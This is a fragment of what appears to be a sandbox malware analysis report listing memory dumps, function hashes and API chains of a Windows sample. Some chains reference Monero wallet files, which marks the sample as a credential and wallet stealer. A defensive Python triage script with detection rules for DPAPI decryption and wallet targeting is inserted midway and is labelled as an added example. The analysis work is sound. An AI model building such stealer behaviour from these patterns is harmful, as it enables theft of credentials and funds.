                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #d.o$#d.o$S'n]
                      • API String ID: 0-1842126938
                      • Opcode ID: c3fbcc7fae8351a59e645d56b87fec0fe0117d524581411100477f71d5146655
                      • Instruction ID: f87cef14687fa60ef9105b53a33fce936e6fb4d9c3c916408a4cfeb4f6fc2f1e
                      • Opcode Fuzzy Hash: c3fbcc7fae8351a59e645d56b87fec0fe0117d524581411100477f71d5146655
                      • Instruction Fuzzy Hash: 646123F3A082005BE70C6E3DEC9977ABAD6DBD5320F1B463DA795C77C0E93848058296
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: wY
                      • API String ID: 0-526496422
                      • Opcode ID: 205f2ea0c0d683df2366fa61ee9b1c8fee7cb1f641e67760fc5ce8b0227243d6
                      • Instruction ID: 01f55dc64fd82fed32067a8d0d56c9eaa02a41593a691b15f78f7e46d3f904bd
                      • Opcode Fuzzy Hash: 205f2ea0c0d683df2366fa61ee9b1c8fee7cb1f641e67760fc5ce8b0227243d6
                      • Instruction Fuzzy Hash: B9B228F360C6049FE304AE2DEC8567AF7E9EF94720F16493DEAC4C3740EA7598058696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: r>y
                      • API String ID: 0-3173497869
                      • Opcode ID: f287669d1038235c5982cf4779a92483f723e06df1000467b13736cdc343c2ec
                      • Instruction ID: 43dead98bc2ab33dd957dc5f9b3f5f8fbdbf85860bb0693212688404aba78b8b
                      • Opcode Fuzzy Hash: f287669d1038235c5982cf4779a92483f723e06df1000467b13736cdc343c2ec
                      • Instruction Fuzzy Hash: EAB2D9F390C2049FE304AE29DC8577ABBE5EF94720F1A892DE6C4C7744EA7598058787
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: *9$^r}
                      • API String ID: 0-1379781516
                      • Opcode ID: e88d2f7116b3380c62c5947fef681ebffa157fd25a692122a1f5cb06ddf35917
                      • Instruction ID: ed75f4c1d718d70500e15f0643bf50e16b0f248a95cbe396d9b29ef248015337
                      • Opcode Fuzzy Hash: e88d2f7116b3380c62c5947fef681ebffa157fd25a692122a1f5cb06ddf35917
                      • Instruction Fuzzy Hash: 90715AB3A185104FF314692DDC457BABAD6DBD4330F2B463DEA88D3784E9394C058285
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: C$r7~
                      • API String ID: 0-3129029804
                      • Opcode ID: 7b02e675fd7ef091c8af83fda018e9dce808090002302e720df0c24faad9bb54
                      • Instruction ID: 3b9c75f2b4d958df6f94cc3e9f02ea38c6082084dd8e3eab35031e260f28a8c7
                      • Opcode Fuzzy Hash: 7b02e675fd7ef091c8af83fda018e9dce808090002302e720df0c24faad9bb54
                      • Instruction Fuzzy Hash: C72107B250D30EAFDF00BE158959A7A7AEDFB41318F280829E587C6600E2715D54A656
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004815B8,00480D96), ref: 0046F71E
                      • StrCmpCA.SHLWAPI(?,004815BC), ref: 0046F76F
                      • StrCmpCA.SHLWAPI(?,004815C0), ref: 0046F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0046FAC3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 25c29c1546c457a8ad7bcbd5dc12ce0d2ebdc1edbee160c13b0bc262f86ce57d
                      • Instruction ID: 6563d5b208e40758e3d76e1af88bd4e8e96e8e4b2987cf703fbb6564713c7896
                      • Opcode Fuzzy Hash: 25c29c1546c457a8ad7bcbd5dc12ce0d2ebdc1edbee160c13b0bc262f86ce57d
                      • Instruction Fuzzy Hash: E911B77080010CABDB14FBB1DC559EE7378AF50304F5186AFA51E56092EF382B1ACBA7
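The two API chains a triager acts on in this part of the listing are the DPAPI pattern at 00469B84 (CryptUnprotectData followed by LocalAlloc/LocalFree, the shape of browser credential-blob decryption) and the FindFirstFileA/FindNextFileA loop at 0046F71E whose subcall references \Monero\wallet.keys. Reading those out of hundreds of near-identical blocks by hand is error-prone, so the following Python script is an added example, not part of the Joe Sandbox report, that parses blocks written in this report's "APIs" layout into per-function API chains and tags the capability patterns. The embedded report text is a constructed excerpt of the two blocks named above, and the rule and tag names are this example's own, not Joe Sandbox signature names.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout (two function blocks only).
SAMPLE_REPORT = """\
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00469B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00469BA3
• LocalFree.KERNEL32(?), ref: 00469BD3
Memory Dump Source
• Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
APIs
  • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\\Monero\\wallet.keys,00480E17), ref: 0047A9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004815B8,00480D96), ref: 0046F71E
• StrCmpCA.SHLWAPI(?,004815BC), ref: 0046F76F
• FindNextFileA.KERNEL32(000000FF,?), ref: 0046FAB1
• FindClose.KERNEL32(000000FF), ref: 0046FAC3
Memory Dump Source
"""

# One API line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional argument list, and the call-site address after "ref:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9_]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-F]{8}$")

# Capability rules (names chosen for this example): a tag applies when every
# listed API is called directly in the block (subcall lines are not counted).
RULES = {
    "dpapi-decrypt": {"CryptUnprotectData"},
    "file-enumeration": {"FindFirstFileA", "FindNextFileA"},
    "base64-encode": {"CryptBinaryToStringA"},
    "timezone-fingerprint": {"GetTimeZoneInformation"},
}


@dataclass
class FunctionBlock:
    label: str                      # call-site address of the first direct API
    apis: list = field(default_factory=list)
    subcall_apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    tags: list = field(default_factory=list)


def _string_args(args):
    # Anything that is neither the '?' placeholder nor an 8-digit hex value is
    # a string the sandbox resolved from memory (a path, a key name, ...).
    return [a for a in args.split(",") if a and a != "?" and not HEX_ARG.match(a)]


def triage(report_text):
    """Split report text into function blocks and tag each one."""
    blocks, current = [], None
    for line in report_text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":                  # a new function block starts
            current = FunctionBlock(label="")
            blocks.append(current)
            continue
        if stripped == "Memory Dump Source":    # the API list of the block ends
            current = None
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        if m["sub"]:
            current.subcall_apis.append(m["api"])
        else:
            current.apis.append(m["api"])
            current.label = current.label or m["ref"]
        if m["args"]:
            current.strings.extend(_string_args(m["args"]))
    for b in blocks:
        present = set(b.apis)
        b.tags = [tag for tag, needed in RULES.items() if needed <= present]
        if any("wallet" in s.lower() for s in b.strings):
            b.tags.append("crypto-wallet-targeting")
    return blocks


if __name__ == "__main__":
    for b in triage(SAMPLE_REPORT):
        print(b.label, "->".join(b.apis), b.strings, b.tags)
```

Feed it the report's function listing (copied as text) instead of SAMPLE_REPORT to get one line per function; extend RULES with further API sets as the sample's other chains (registry checks, process enumeration) become relevant to the triage.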
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: sZ?
                      • API String ID: 0-2346340252
                      • Opcode ID: 66cdcd1d76a6802b8067663dc636f023997d4455d3eb82093b9845a3b2f6581e
                      • Instruction ID: 74a40012f217c2b35455f40320e0681349383d40db77956004f2622219bf4c1b
                      • Opcode Fuzzy Hash: 66cdcd1d76a6802b8067663dc636f023997d4455d3eb82093b9845a3b2f6581e
                      • Instruction Fuzzy Hash: B93133F7F096201BF308883DDD8872676D6D3D4321F2A823EEA4597BC8EC795C094285
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: da124e022ad32c0c21ea6043963b057e2386b158cffd2cd3ec0de1a0f4a608d7
                      • Instruction ID: ac9f111d01e3812841255bb34fa32caa4baece1b6fd5003ff9d645698c207844
                      • Opcode Fuzzy Hash: da124e022ad32c0c21ea6043963b057e2386b158cffd2cd3ec0de1a0f4a608d7
                      • Instruction Fuzzy Hash: 984205F3A0C2149FE7046F29EC8567ABBE9EF94320F16493DEAC493744EA3558018797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 596695106ae1e1636638a2932874c33c73455c0b08245aea9d849a315b7a7974
                      • Instruction ID: 7bfe748fe68afccd7a1c292c0914c7fcfd2fffab56ced1e35217725373c38507
                      • Opcode Fuzzy Hash: 596695106ae1e1636638a2932874c33c73455c0b08245aea9d849a315b7a7974
                      • Instruction Fuzzy Hash: E6612CB3A0C2146FF3046A6DEC45B7BB7D9DBC4770F2A423DEA94C3780E93558058696
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eec1c907b63519b9957a8d52e0ebb9ed81b1cbe95a7d9a5c5202e7cd1feefa0f
                      • Instruction ID: 9f27c11480a6f830129bfd470985301fbba349611ca89c3fc3ebae2f4e2b8dcd
                      • Opcode Fuzzy Hash: eec1c907b63519b9957a8d52e0ebb9ed81b1cbe95a7d9a5c5202e7cd1feefa0f
                      • Instruction Fuzzy Hash: 2D7126F3E086048FF3046E38DC84766B6D5EB94310F1A863DDAC8D7784E97A9D468682
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6636fd2c54338e16cb01f3c99d1ee7045250937e8bb6b82cf6c03f6243b01d5
                      • Instruction ID: d0acdccede97b74fe5793a5cfaaa0ca4e3905bc9ab586abb24c609c22945aa83
                      • Opcode Fuzzy Hash: d6636fd2c54338e16cb01f3c99d1ee7045250937e8bb6b82cf6c03f6243b01d5
                      • Instruction Fuzzy Hash: 8D5167F3D082204BE3186A2DDC5536AB7E5DBD0320F2B463DEEC5A7384E93A5C4186C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
